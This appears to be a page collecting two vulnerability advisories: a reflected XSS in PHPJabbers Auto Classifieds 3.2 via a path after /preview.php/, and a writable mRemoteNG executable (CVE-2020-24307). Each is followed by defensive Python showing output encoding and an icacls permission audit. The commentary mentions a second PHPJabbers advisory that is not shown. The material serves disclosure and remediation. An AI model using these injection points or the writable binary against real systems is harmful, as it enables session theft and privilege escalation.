<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Auto Classifieds Script 3.2 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php/<br /><br />URL parameter vulnerable to XSS<br /><br />/preview.php/[XSS]?controller=pjListings&action=pjActionSearch<br /><br /><br /><br />[-] Done<br /></code></pre>
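The two PHPJabbers advisories above report the same defect class at two injection points: a path segment after `/preview.php/` and the `keyword` GET parameter are reflected into the page without encoding. As an added example, not PHPJabbers code and not part of either advisory, the following Python model renders a search page from a request URI two ways: interpolating the raw values (the reported defect) and encoding each value for the context it lands in (URL, HTML attribute, HTML text). The page template and the names `render_unsafe` and `render_safe` are this example's own assumptions.

```python
"""Reflected XSS: raw reflection versus context-aware output encoding.

Added example (not PHPJabbers code): models a search page that reflects the
request path into a form action and the `keyword` parameter into an input
attribute and the page body, the two injection points the advisories list.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit


def _keyword_from(request_uri: str) -> str:
    """Extract the `keyword` GET parameter, or "" when absent."""
    return parse_qs(urlsplit(request_uri).query).get("keyword", [""])[0]


def render_unsafe(request_uri: str) -> str:
    """Vulnerable: path and keyword are interpolated verbatim into HTML."""
    keyword = _keyword_from(request_uri)
    return (f'<form action="{request_uri}">'
            f'<input name="keyword" value="{keyword}">'
            f'</form><p>Results for {keyword}</p>')


def render_safe(request_uri: str) -> str:
    """Hardened: each reflected value is encoded for the context it lands in."""
    parts = urlsplit(request_uri)
    keyword = _keyword_from(request_uri)
    # URL context: percent-encode the path so it cannot carry markup or quotes,
    # then HTML-escape it because it sits inside a quoted attribute.
    action = html.escape(quote(parts.path, safe="/"), quote=True)
    # Attribute context: quotes must be escaped too, or the value breaks out.
    kw_attr = html.escape(keyword, quote=True)
    # Text context: angle brackets and ampersands are enough here.
    kw_text = html.escape(keyword)
    return (f'<form action="{action}">'
            f'<input name="keyword" value="{kw_attr}">'
            f'</form><p>Results for {kw_text}</p>')


# Constructed sample requests mirroring the advisories' two injection points;
# a harmless <b> tag stands in for the [XSS] placeholder.
SAMPLE_PATH_REQUEST = "/preview.php/<b>x</b>?controller=pjListings&action=pjActionSearch"
SAMPLE_KEYWORD_REQUEST = ('/preview.php?controller=pjListings&action=pjActionIndex'
                          '&listing_search=1&keyword="><b>x</b>')

if __name__ == "__main__":
    for uri in (SAMPLE_PATH_REQUEST, SAMPLE_KEYWORD_REQUEST):
        print("UNSAFE:", render_unsafe(uri))
        print("SAFE:  ", render_safe(uri))
```

The hardened version still reflects the request path only to keep the comparison one-to-one; a tighter fix is to emit the script's own known URL in the form action and never echo the incoming path at all. The point the example makes is that one escaping function is not enough: the same `keyword` value needs attribute escaping (quotes included) in the `<input>` and plain text escaping in the `<p>`, and the path needs percent-encoding before it is placed in a URL attribute.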
<pre><code>mRemoteNG v1.76.20 Privilege Escalation<br /><br /><br />Detailed Information<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Product Name: mRemoteNG<br />Vendor Home Page: https://mremoteng.org<br />Vulnerable Version: mRemoteNG v1.76.20<br />Fixed Version: mRemoteNG v1.76.20.24615<br />Vulnerability Type: Improper Access Control (CWE-284)<br />CVE Reference: CVE-2020-24307<br />Author of Advisory: Thurein Soe<br /><br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Product Description:<br /><br />mRemoteNG is an open-source, multi-protocol remote connections manager for<br />Windows that allows managing multiple diverse connections with remote<br />systems.<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Vulnerability description:<br /><br />Weak Windows service permissions are a well-known class of local privilege<br />escalation on the Windows operating system. When a service runs with SYSTEM<br />privileges but its executable can be modified by standard users, a standard<br />user can elevate to administrator privilege on the compromised system by<br />modifying the service. 
mRemoteNG.exe granted the Modify permission to all authenticated users<br />(BUILTIN\Users) on the Windows operating system, which allows a standard user<br />to modify the executable and thereby escalate privileges.<br /><br />C:\Users\NyaMeeEain>icacls "C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe"<br />C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe APPLICATION PACKAGE<br />AUTHORITY\ALL APPLICATION PACKAGES:(M)<br />BUILTIN\Users:(M)<br />APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(M)<br />NT AUTHORITY\SYSTEM:(I)(F)<br />BUILTIN\Administrators:(I)(F)<br />BUILTIN\Users:(I)(RX)<br />APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />References:<br />https://www.immuniweb.com/vulnerability/improper-access-control.html<br />https://www.cvedetails.com/cwe-details/284/Access-Control-Authorization-Issues.html<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Credits:<br />Thurein Soe<br />------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /></code></pre>
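The condition the advisory documents, a program or service binary whose ACL grants write-capable rights to a low-privilege principal, is something a defender can check for across a fleet by parsing `icacls` output. The following Python script is an added example, not part of the advisory or of mRemoteNG: it reads the `icacls` listing (the advisory's own output is embedded as constructed sample input), decodes each ACE, and flags entries where a principal any local user or app container can act as holds a right that allows altering or replacing the file. The `WRITE_RIGHTS` and `LOW_PRIV_PRINCIPALS` sets, the `audit_icacls_output` function and the `Finding` type are this example's own assumptions.

```python
"""Flag write-capable ACEs granted to low-privilege principals in icacls output.

Added example (not from the advisory): a defender-side check that a program
binary or service executable is not modifiable by standard users.
"""
import re
from typing import Iterator, List, NamedTuple, Tuple

# icacls right abbreviations that let a principal alter or replace the file.
# D and DC are included because deleting a binary and dropping a new one in
# its place has the same effect as modifying it.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "WDAC", "WO", "DC"}

# Principals that any local user, or any app container process, can act as.
# Compared case-insensitively.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "builtin\\guests",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
    "nt authority\\anonymous logon",
    "application package authority\\all application packages",
    "application package authority\\all restricted application packages",
}

# One ACE as icacls prints it: "<principal>:(flag)(flag)(right)".
ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<perms>(?:\([^)]*\))+)$")


class Finding(NamedTuple):
    principal: str
    rights: str       # the offending right, e.g. "M"
    inherited: bool   # True when the ACE carries the (I) flag


def parse_aces(output: str, path: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (principal, tokens) for each ACE line of `icacls <path>` output."""
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):            # first line: "<path> <first ACE>"
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:                            # blank line or icacls summary line
            continue
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", m.group("perms"))
                  for t in grp.split(",") if t]
        yield m.group("principal").strip(), tokens


def audit_icacls_output(output: str, path: str) -> List[Finding]:
    """Return every write-capable right held by a low-privilege principal."""
    findings: List[Finding] = []
    for principal, tokens in parse_aces(output, path):
        if principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        if "DENY" in tokens:                 # a deny ACE grants nothing
            continue
        inherited = "I" in tokens
        for right in tokens:
            if right in WRITE_RIGHTS:
                findings.append(Finding(principal, right, inherited))
    return findings


# Constructed sample input: the advisory's icacls listing, laid out the way
# icacls prints it (continuation ACEs indented, summary line at the end).
TARGET_PATH = r"C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe"
ICACLS_OUTPUT = r"""C:\Program Files (x86)\mRemoteNG\mRemoteNG.exe APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(M)
                                               BUILTIN\Users:(M)
                                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(M)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)
                                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for f in audit_icacls_output(ICACLS_OUTPUT, TARGET_PATH):
        kind = "inherited" if f.inherited else "explicit"
        print(f"WRITABLE by {f.principal}: right {f.rights} ({kind})")
```

On the advisory's listing this reports three problems: the explicit Modify grant to BUILTIN\Users that the advisory calls out, plus an explicit and an inherited Modify grant to ALL APPLICATION PACKAGES. The inherited flag matters for remediation: an explicit ACE is fixed on the file itself, while an inherited one points at the parent directory's ACL, and a fix applied only to the file will be undone the next time inheritance is propagated.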
